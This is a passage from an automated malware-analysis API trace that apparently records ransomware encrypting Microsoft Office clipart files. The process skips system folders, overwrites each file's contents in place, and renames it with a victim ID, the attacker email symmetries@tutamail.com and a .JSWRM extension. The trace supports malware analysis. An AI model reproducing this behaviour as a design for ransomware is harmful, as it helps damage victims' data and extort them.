hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0080.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0080.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099201.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099201.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099201.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0080.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0080.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.060] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=51401) returned 1 [0080.060] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc8c0) returned 0x24d210 [0080.060] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc8c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc8c0, lpOverlapped=0x0) returned 1 [0080.065] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.065] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc8c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc8c0, lpOverlapped=0x0) returned 1 [0080.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.066] CloseHandle (hObject=0x314) returned 1 [0080.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0080.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0080.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0080.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0080.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0080.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.066] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0080.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0080.067] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1367, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099202.GIF", cAlternateFileName="")) returned 1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2=".") returned 1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="..") returned 1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="...") returned 1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="windows") returned -1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="recovery") returned -1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="perflogs") returned -1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="documents and settings") returned 1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="system volume information") returned -1 [0080.067] lstrcmpiW (lpString1="J0099202.GIF", lpString2="msocache") returned -1 [0080.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099202.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099202.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099202.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099202.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099202.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099202.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.068] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4967) returned 1 [0080.068] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1360) returned 0x205850 [0080.071] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1360, lpOverlapped=0x0) returned 1 [0080.073] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.073] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1360, lpOverlapped=0x0) returned 1 [0080.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.073] CloseHandle (hObject=0x314) returned 1 [0080.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0080.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0080.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0080.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0080.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0080.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.074] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0080.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.075] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe56c811, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe56c811, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099203.GIF", cAlternateFileName="")) returned 1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2=".") returned 1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="..") returned 1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="...") returned 1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="windows") returned -1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="recovery") returned -1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="perflogs") returned -1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="documents and settings") returned 1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="system volume information") returned -1 [0080.075] lstrcmpiW (lpString1="J0099203.GIF", lpString2="msocache") returned -1 [0080.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099203.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099203.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099203.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099203.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099203.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099203.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0080.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0080.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.076] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3904) returned 1 [0080.076] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf40) returned 0x23fc98 [0080.076] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf40, lpOverlapped=0x0) returned 1 [0080.088] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.088] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf40, lpOverlapped=0x0) returned 1 [0080.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0080.088] CloseHandle (hObject=0x314) returned 1 [0080.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0080.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0080.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0080.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0080.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0080.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0080.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.088] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0080.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0080.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0080.089] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe56c811, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe56c811, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45be, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099204.WMF", cAlternateFileName="")) returned 1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2=".") returned 1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="..") returned 1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="...") returned 1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="windows") returned -1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="recovery") returned -1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="perflogs") returned -1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="documents and settings") returned 1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="system volume information") returned -1 [0080.089] lstrcmpiW (lpString1="J0099204.WMF", lpString2="msocache") returned -1 [0080.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0080.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099204.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099204.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099204.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0080.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099204.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099204.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099204.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0080.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0080.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0080.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.090] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17854) returned 1 [0080.090] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 